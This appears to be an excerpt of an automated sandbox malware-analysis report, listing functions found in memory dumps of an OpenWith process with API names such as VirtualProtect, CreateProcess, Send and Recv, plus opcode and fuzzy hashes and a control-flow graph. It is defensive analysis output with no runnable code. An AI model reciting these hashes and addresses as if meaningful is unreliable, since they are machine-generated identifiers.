                                              • Instruction Fuzzy Hash: FEA12C3160CA889FDB55EF58C8C5AAAB7F1FB94300F504A7EE04FC7291DA34A945CB85
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: _calloc_dbg
                                              • String ID:
                                              • API String ID: 1170608187-0
                                              • Opcode ID: eb07f6567f13b0bb31f14b250f796744979e63487f4f542db19a2ba65ce8570a
                                              • Instruction ID: 36150e177aa22013b754a7ceca6e1e1a97a40d16fa070458ea83428300278600
                                              • Opcode Fuzzy Hash: eb07f6567f13b0bb31f14b250f796744979e63487f4f542db19a2ba65ce8570a
                                              • Instruction Fuzzy Hash: 65918231A1CAC87BEB59A7589C525AB72E1EFD4348F40453AE41FC3287EE18FE01C695
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: Recv
                                              • String ID:
                                              • API String ID: 4192927123-0
                                              • Opcode ID: 653fe3a6da9e8edf6d7f9aad963387fd79a7ca64ce6bed9a03fbf4fad2203229
                                              • Instruction ID: 61bb3539fc355fe00dfa97529dc57498630c906175467e43e98fb57cb044b97f
                                              • Opcode Fuzzy Hash: 653fe3a6da9e8edf6d7f9aad963387fd79a7ca64ce6bed9a03fbf4fad2203229
                                              • Instruction Fuzzy Hash: 37A19131A18B856FE798DB28C8C86A6B3F0FF95324F50057BD45FC6991DB38E8518B81
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: _calloc_dbg
                                              • String ID:
                                              • API String ID: 1170608187-0
                                              • Opcode ID: 2479110834a0a50aa720895a2966e0087a87a39eabe9dff41225e0602a7593e9
                                              • Instruction ID: 90805f7f4886f380d76c9ba50580d7f421b2ea7ddabbb0df5a71967676c7faef
                                              • Opcode Fuzzy Hash: 2479110834a0a50aa720895a2966e0087a87a39eabe9dff41225e0602a7593e9
                                              • Instruction Fuzzy Hash: 8581713061CA489FDB58EF18D8C19A6B3E1FF98710F51427AD44BC7696EA34E842CBC5
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              • Opcode ID: e8d5d7329d2320a05d82013e26ca3d8c66ee9948d03da3e8e50157f1609a8dd5
                                              • Instruction ID: d7197e316cb63c34e868b29da431a2f3cb702cd1ca7363d8d5413594b9b52506
                                              • Opcode Fuzzy Hash: e8d5d7329d2320a05d82013e26ca3d8c66ee9948d03da3e8e50157f1609a8dd5
                                              • Instruction Fuzzy Hash: 81919D3161DB889FE765EB24C889B9AB7E1FF98301F10492BE58AC3251DB34D544CB42
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: Send
                                              • String ID:
                                              • API String ID: 121738739-0
                                              • Opcode ID: d8e018eafecf73722f3cfd2108c578dd3fd3213e6426fbbfe5b50f999653df9c
                                              • Instruction ID: 8906996e89897d5a08ab117b54a2a2e9b53e3ebcdec3bfac80b267b674734290
                                              • Opcode Fuzzy Hash: d8e018eafecf73722f3cfd2108c578dd3fd3213e6426fbbfe5b50f999653df9c
                                              • Instruction Fuzzy Hash: 8C815A70608B499FEB98DF28C8887A6B7E0FF94314F10467AD44EC7A91DB35E854CB81
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: InformationVolume
                                              • String ID:
                                              • API String ID: 2039140958-0
                                              • Opcode ID: 458a1419ed12d8a3c2e86420f2914f8409b820493848f008ec8053e1bf8f0b77
                                              • Instruction ID: 05517699b928691bd64d9543f2999ee40ea0243be67719ecbae3e00cdce5f0e9
                                              • Opcode Fuzzy Hash: 458a1419ed12d8a3c2e86420f2914f8409b820493848f008ec8053e1bf8f0b77
                                              • Instruction Fuzzy Hash: 63614B7150C7889BE765EF64D8D56EBB7E1FB98300F400A2EE08BC2191DE39A545CB46
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: _calloc_dbg
                                              • String ID:
                                              • API String ID: 1170608187-0
                                              • Opcode ID: 432e0892bdd6e9e5754dca25717e4c9921a6f544cc56197876346fab22609208
                                              • Instruction ID: 55da3f15ce6f1624be2bc9917bfca8942962dd08b72da999ffb2fb341e8a426d
                                              • Opcode Fuzzy Hash: 432e0892bdd6e9e5754dca25717e4c9921a6f544cc56197876346fab22609208
                                              • Instruction Fuzzy Hash: 6051C33150CE489FDB08EF58D8C59AA77E0FBA8310F04466EE44EC7252DA75F981CB85
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: e9169745a3f5c8f3addee9eb58fc29d082d9d243fdbbd28d7b824531286ef21a
                                              • Instruction ID: ba029921198e9e5a770e7e948c71fcf7bc67f889eecb6eb9b26acc01da738dd0
                                              • Opcode Fuzzy Hash: e9169745a3f5c8f3addee9eb58fc29d082d9d243fdbbd28d7b824531286ef21a
                                              • Instruction Fuzzy Hash: A7512D3061DB885BE768DB58989576BB7E5FFD4310F000A3FE48AC3191EE78E8018B52
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID:
                                              • API String ID: 613200358-0
                                              • Opcode ID: 903acddc3c2cbd21899d181af60d2020bd4c0d22b9f6ec9809e98e44769c02c6
                                              • Instruction ID: 29321a41f6f6ec8f0e8d088489e9ba28cebdb875a7c55474a62900263e955bb9
                                              • Opcode Fuzzy Hash: 903acddc3c2cbd21899d181af60d2020bd4c0d22b9f6ec9809e98e44769c02c6
                                              • Instruction Fuzzy Hash: 22412031618A489FDB94EF18C8C1AA6B3E1FFD8310F64467AD44EC7296DA35F841CB85
                                              APIs
                                                • Part of subcall function 00007DF4218965E0: VirtualProtect.KERNELBASE ref: 00007DF421896640
                                                • Part of subcall function 00007DF4218965E0: VirtualProtect.KERNELBASE ref: 00007DF421896669
                                                • Part of subcall function 00007DF4218965E0: VirtualProtect.KERNELBASE ref: 00007DF421896685
                                                • Part of subcall function 00007DF4218965E0: VirtualProtect.KERNELBASE ref: 00007DF4218966B0
                                              • TlsFree.KERNELBASE(?,?,?,?,?,?,?,00000000,?,?,00000000,00007DF42189341C), ref: 00007DF421897CB7
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual$Free
                                              • String ID:
                                              • API String ID: 3841229516-0
                                              • Opcode ID: 9454607179550a56fcb25c77309fc397396c8818e949c4bf6b88fbdfb1fa50f0
                                              • Instruction ID: 5e030d711f00168657515857071568856da5feffe976601b7fe37e4fe869c2f9
                                              • Opcode Fuzzy Hash: 9454607179550a56fcb25c77309fc397396c8818e949c4bf6b88fbdfb1fa50f0
                                              • Instruction Fuzzy Hash: 5241A330B08A985FEB54EB2898C556A73A1FF89704B004977E41BC7286DE28FC408B96
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: _malloc_dbg
                                              • String ID:
                                              • API String ID: 1527718024-0
                                              • Opcode ID: c3b5330ba83a094f7bad87bbcfda8b7898b28b22e9f53235a9dbd9f71cfcc7c9
                                              • Instruction ID: 91eab42907a5a3a60b0b1d31daab7222bd1e13cc860c563dfa6e4068f78f9c69
                                              • Opcode Fuzzy Hash: c3b5330ba83a094f7bad87bbcfda8b7898b28b22e9f53235a9dbd9f71cfcc7c9
                                              • Instruction Fuzzy Hash: 45411931A0849C5BEB68EE288CD417B37F1EFC5349715817BD86BCB186DA28E946C790
                                              APIs
                                              • ??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,?,000000EE,?,00007DF4219595EF), ref: 00007DF421962482
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID:
                                              • API String ID: 613200358-0
                                              • Opcode ID: a9683185239d0d4a7a56ce16b1c41f8a860c91c23b889e5507fec3a698ee7d2e
                                              • Instruction ID: 28dcef5dec6c8efba66bfb0bbbfb13d16eda5168049fd0ed3d4afc11d67e3ac1
                                              • Opcode Fuzzy Hash: a9683185239d0d4a7a56ce16b1c41f8a860c91c23b889e5507fec3a698ee7d2e
                                              • Instruction Fuzzy Hash: 5D418F30719E8E6FEA98FB58889476AB6B5FF98744F50007AD50FC3282DE28EC51C750
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: _calloc_dbg
                                              • String ID:
                                              • API String ID: 1170608187-0
                                              • Opcode ID: 1510f62e4c51649cb4b3fc6bb3479c9fee78b3cdc066acf53db6694c8fe85d1c
                                              • Instruction ID: ffd59b02ac7369363e6d020df3a16f60b1d591e72bafab15eb96a0c53ad4f61f
                                              • Opcode Fuzzy Hash: 1510f62e4c51649cb4b3fc6bb3479c9fee78b3cdc066acf53db6694c8fe85d1c
                                              • Instruction Fuzzy Hash: A541DB70908A189FDBA1DF1894887D57BE1FB68701F1842BBDC4ECF25ADB749885CB90
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: ErrorFunctionModeTable
                                              • String ID:
                                              • API String ID: 928017140-0
                                              • Opcode ID: d9c23544fbb2a9f569b4c70e99ee3ada11af114710c16124923c5dd5b1b488fd
                                              • Instruction ID: 562322747aa1f8909445d3987fda64598889664bfa92aa5ba54441f556b0199c
                                              • Opcode Fuzzy Hash: d9c23544fbb2a9f569b4c70e99ee3ada11af114710c16124923c5dd5b1b488fd
                                              • Instruction Fuzzy Hash: DB318225B189896BEB55FBB89CC256B72E1FFD4310B40053AE80FC33D2D918ED468789
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: setsockopt
                                              • String ID:
                                              • API String ID: 3981526788-0
                                              • Opcode ID: 5ecb9aca37cfa74a852660f22e24977ddf5ffe3d9d8c212dab6545ea967c75f3
                                              • Instruction ID: e250fd2e842d2c68959619370e25025f273c9156027d4689209d6a23efecb3c0
                                              • Opcode Fuzzy Hash: 5ecb9aca37cfa74a852660f22e24977ddf5ffe3d9d8c212dab6545ea967c75f3
                                              • Instruction Fuzzy Hash: AC31D770904B459FEB98DF28D4C8B6177E1FB55325F1002BAD85ACA2E6DB749881CB40

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 95 1f66438185c-1f66438188c call 1f6643808a4 * 2 100 1f664381940-1f664381947 95->100 101 1f664381892-1f664381895 95->101 101->100 102 1f66438189b-1f6643818a5 101->102 102->100 103 1f6643818ab-1f6643818b0 102->103 103->100 104 1f6643818b6-1f6643818c3 103->104 104->100 105 1f6643818c5-1f6643818cd 104->105 105->100 106 1f6643818cf-1f6643818da 105->106 106->100 107 1f6643818dc-1f6643818e3 106->107 107->100 108 1f6643818e5-1f6643818e8 107->108 108->100 109 1f6643818ea-1f6643818f2 108->109 109->100 110 1f6643818f4-1f6643818f7 109->110 110->100 111 1f6643818f9-1f664381902 110->111 111->100 112 1f664381904-1f664381908 111->112 112->100 113 1f66438190a-1f66438191a 112->113 113->100 115 1f66438191c-1f664381933 GetProcessMitigationPolicy 113->115 115->100 116 1f664381935-1f66438193a 115->116 116->100 117 1f66438193c-1f66438193d 116->117 117->100
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.1740887784.000001F664380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F664380000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_1f664380000_OpenWith.jbxd
                                              Similarity
                                              • API ID: MitigationPolicyProcess
                                              • String ID:
                                              • API String ID: 1088084561-0
                                              • Opcode ID: 04359cd7b97b11c476e8c0617afcaa098c35e265ec660168a6fbd24c0647ca60
                                              • Instruction ID: ab96137dffae4b44733e3f11cd4a997dbd2539f6f367b43fe75d2b31b67450a1
                                              • Opcode Fuzzy Hash: 04359cd7b97b11c476e8c0617afcaa098c35e265ec660168a6fbd24c0647ca60
                                              • Instruction Fuzzy Hash: 4F31AD30200A0B5EEF65976A88847F1F7D6EB943B1F1801FAC026DA1D9DA71DA81D780
                                              APIs
                                              • _malloc_dbg.MSVCRT(?,?,?,?,?,FFFFFFFF,-00000001,-00000002,-00000001,00007DF4218C2CFA), ref: 00007DF4218A3867
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: _malloc_dbg
                                              • String ID:
                                              • API String ID: 1527718024-0
                                              • Opcode ID: aa4f1f029a65678ad9f3ad1f83a567308f2cd0838b93955c777e9bc3ae762b5b
                                              • Instruction ID: 730c357e63922cffdbbe19bae7f36769a2dfa8cf767c8155e689a20530bce77e
                                              • Opcode Fuzzy Hash: aa4f1f029a65678ad9f3ad1f83a567308f2cd0838b93955c777e9bc3ae762b5b
                                              • Instruction Fuzzy Hash: D2219031614D1C8FDB59EF1DDC8C7A277E1EBA831171442BBDC0ACB265DA35E8848791
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID:
                                              • API String ID: 613200358-0
                                              • Opcode ID: 300bfe15e1352cda4c3c9a5eb26de8ea91f06f6889c64728d4398b9a5c111e42
                                              • Instruction ID: 31a9bdd9798484a1fba328cdb643b0d1d8f76fcf5107b89765a2baad9ead4a7c
                                              • Opcode Fuzzy Hash: 300bfe15e1352cda4c3c9a5eb26de8ea91f06f6889c64728d4398b9a5c111e42
                                              • Instruction Fuzzy Hash: 7C214C31609A0D9FDF84EF28D849AAA77E4FF94315F00462AE84ED3251DB38E941CB90
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1431623286.000001F665D80000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F665D80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_1f665d80000_OpenWith.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 8f0f157fb83daee5cb6c9520c57f82bef06885daf9e14b2ffd789235ee1ccf1c
                                              • Instruction ID: f81c0bc02ca9947da621fb800472eb9a02c1b6ef061d230d122a3ef033bfb11a
                                              • Opcode Fuzzy Hash: 8f0f157fb83daee5cb6c9520c57f82bef06885daf9e14b2ffd789235ee1ccf1c
                                              • Instruction Fuzzy Hash: C8018F70610E06BBE7689B38D889775B3E1FB98321F040679E41AC32C1DB64EC91C785
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: a1e79bfd5fdfa4d599be838d72d64bf9e685b5698f2b0b05ab8498b458f49234
                                              • Instruction ID: 153b57195e99aef13bbe2fb880886659daaef3649a3ca9a046bd21a50fd61304
                                              • Opcode Fuzzy Hash: a1e79bfd5fdfa4d599be838d72d64bf9e685b5698f2b0b05ab8498b458f49234
                                              • Instruction Fuzzy Hash: BD01A231A1491D9FEB94AB69DC8863633E6EF89391B050076E80EC7154DA39AC42C781
                                              APIs
                                              • ??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,?,?,-00000001,00007DF42189D0B5), ref: 00007DF42189BAFB
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID:
                                              • API String ID: 613200358-0
                                              • Opcode ID: 75680fa04e19e4440b4640af9aa4d4391f4b0436c9268b337d289e293cb6ea92
                                              • Instruction ID: 062b8c6bbbbf039b09b88736903e38959c7efe39c43ec019c9c5816e59355b70
                                              • Opcode Fuzzy Hash: 75680fa04e19e4440b4640af9aa4d4391f4b0436c9268b337d289e293cb6ea92
                                              • Instruction Fuzzy Hash: 5A01F63020894C9FDF94EB1CD8D8E6573E5EBA8310B1805AAD40ECB295CA65EC828B40
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID:
                                              • API String ID: 613200358-0
                                              • Opcode ID: e005b8aad8ae59e5c4306d33e7cf4f806ca0153c9240256dc9db618efce1777c
                                              • Instruction ID: 39e25d8ef76eb03e877d25f234bf20bc2723a0623359c875b3e71eca470b75ba
                                              • Opcode Fuzzy Hash: e005b8aad8ae59e5c4306d33e7cf4f806ca0153c9240256dc9db618efce1777c
                                              • Instruction Fuzzy Hash: B3F0123061BA0E9BFF6CABA59CD866B37B1EF54306B04143FEC0BD15A0CA6D9854D721
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: DestroyHeap
                                              • String ID:
                                              • API String ID: 2435110975-0
                                              • Opcode ID: e8b38785987ebe4bf97a71b2e294a612045f12fa57e0274daf3e7e500e703184
                                              • Instruction ID: f8c4c9f093e2052e2089e5811f2ad75a4e36a316905ef8dc4ae9c78b4e64a601
                                              • Opcode Fuzzy Hash: e8b38785987ebe4bf97a71b2e294a612045f12fa57e0274daf3e7e500e703184
                                              • Instruction Fuzzy Hash: 58013C70A096599FEB54EF69BCC612676B2FB98351B45413FE00EC79A0CA386880CB52
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: CreateHeap
                                              • String ID:
                                              • API String ID: 10892065-0
                                              • Opcode ID: f6a5c260a6ff26826b95901847e0f94daf167b208f970919ab6999429e88efbf
                                              • Instruction ID: f77b0c661c86c23ca736650f39affce40138a657e0402c5051f79c98ddfec3aa
                                              • Opcode Fuzzy Hash: f6a5c260a6ff26826b95901847e0f94daf167b208f970919ab6999429e88efbf
                                              • Instruction Fuzzy Hash: 47F0A061B1A2899BE720AF755CC112A61A3EBC8352F56457BE80BCA185EC399C81C642
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: AddressCallerProc
                                              • String ID:
                                              • API String ID: 2663294120-0
                                              • Opcode ID: c2543c20c0a7d110227d86949c13dfaa5e54e54e664fb098b1aa0bdcf88303a9
                                              • Instruction ID: a1648d05b8b3346407fb29ca77d689e6c5c141ae9d016b5c5f12899026c4f600
                                              • Opcode Fuzzy Hash: c2543c20c0a7d110227d86949c13dfaa5e54e54e664fb098b1aa0bdcf88303a9
                                              • Instruction Fuzzy Hash: 1FE0C211B18C0D1B6B6862BE288CA7751D6CBDC272304027BE81EC3295EC14CC850380
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: setsockopt
                                              • String ID:
                                              • API String ID: 3981526788-0
                                              • Opcode ID: ddedd6023ad442b8d2b2fe3290ed3783bcd232237776f9c3a295af58d00cf6c3
                                              • Instruction ID: 53b4a0a4e79a57d982f23c7299dac81dde3efb18230a53ce4c242909a5e868da
                                              • Opcode Fuzzy Hash: ddedd6023ad442b8d2b2fe3290ed3783bcd232237776f9c3a295af58d00cf6c3
                                              • Instruction Fuzzy Hash: 2CF08C74204A048FEB48EF5CC88876677E2FFE8325F10016AE90EC72E4DB369989C741
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: 23f3765db31a0df280e37a6bc4f8137308a1fee0486dc2818908f898aea27d2f
                                              • Instruction ID: c076b59af0e72806b2472201f695b54bc63e28b6ed3703abb36710452691a838
                                              • Opcode Fuzzy Hash: 23f3765db31a0df280e37a6bc4f8137308a1fee0486dc2818908f898aea27d2f
                                              • Instruction Fuzzy Hash: ADE0C232B150240BF72C6ABD2C8917A36DAC7CC572705423BF80AC3284ED7C8C4602D1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: _malloc_dbg
                                              • String ID:
                                              • API String ID: 1527718024-0
                                              • Opcode ID: 4c39f900df3972edeb9c523e4745635d2babc99cae264e1317ea5b764d4d565e
                                              • Instruction ID: b3f8b73e5ffe4c4d6b320fefc4d6c696f52aaa585e05b47bbf551173c06b8065
                                              • Opcode Fuzzy Hash: 4c39f900df3972edeb9c523e4745635d2babc99cae264e1317ea5b764d4d565e
                                              • Instruction Fuzzy Hash: A3D05E11B15D0D1BAB58A27E1C8A12621D6DBD81227440637B80AC2260ED29CC468250
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: FunctionTable
                                              • String ID:
                                              • API String ID: 1252446317-0
                                              • Opcode ID: 3b09555bf32cd7a482aca5e21dc4f37ab037edd0c1b9afc7390cc3b8e22e33b4
                                              • Instruction ID: 8f298b0b77637895e5a29f132455ede913bb4f06b5e4a3f4575adf6f3fd3137b
                                              • Opcode Fuzzy Hash: 3b09555bf32cd7a482aca5e21dc4f37ab037edd0c1b9afc7390cc3b8e22e33b4
                                              • Instruction Fuzzy Hash: 4EE04F305519095BEBA8E61DC8493513AE0FB98306F64427DD805C96D1CB39D89BCF81
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                              • Instruction ID: d2d5b14ed622bd10ab8a5ccb37e25b8514a013ff251dbc888e29767cfd00138f
                                              • Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                              • Instruction Fuzzy Hash: F4D0A710725D0D2BEB48633D1CD472721D5EBDC261F54013BF80EC2281DD59CC550301
                                              APIs
                                              • GetSystemInfo.KERNELBASE(?,00007DF42191B7C7,?,?,?,?,00000000,00000000), ref: 00007DF421909F21
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: InfoSystem
                                              • String ID:
                                              • API String ID: 31276548-0
                                              • Opcode ID: d72fac8d1d1b7f96bb5fe0759d88f2d5c6e0343dfc4f10e03c2c9322f33a3d86
                                              • Instruction ID: a1c45f944dda750156d012dfaa21513b7f3e3a821da8921c28725f772828e96b
                                              • Opcode Fuzzy Hash: d72fac8d1d1b7f96bb5fe0759d88f2d5c6e0343dfc4f10e03c2c9322f33a3d86
                                              • Instruction Fuzzy Hash: 23E04F319188594BF30DF734DCD58E73671EBA4700F914632D807810A2ED3C6659C681
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID:
                                              • API String ID: 613200358-0
                                              • Opcode ID: f40fb4788220d337bb008d16cea7b0a0ee6a5daf6a138a5e0a6bf71422f7da42
                                              • Instruction ID: c6c55f136108f8f7504559c28296e1478b47616a70f148d1396e8c3fe9f31c3d
                                              • Opcode Fuzzy Hash: f40fb4788220d337bb008d16cea7b0a0ee6a5daf6a138a5e0a6bf71422f7da42
                                              • Instruction Fuzzy Hash: 21D05E34706E4E4BFF9CA6AA88EC53622A1EF98202708107DD80BC1DE1CA59D8409301
                                              APIs
                                              Memory Dump Source
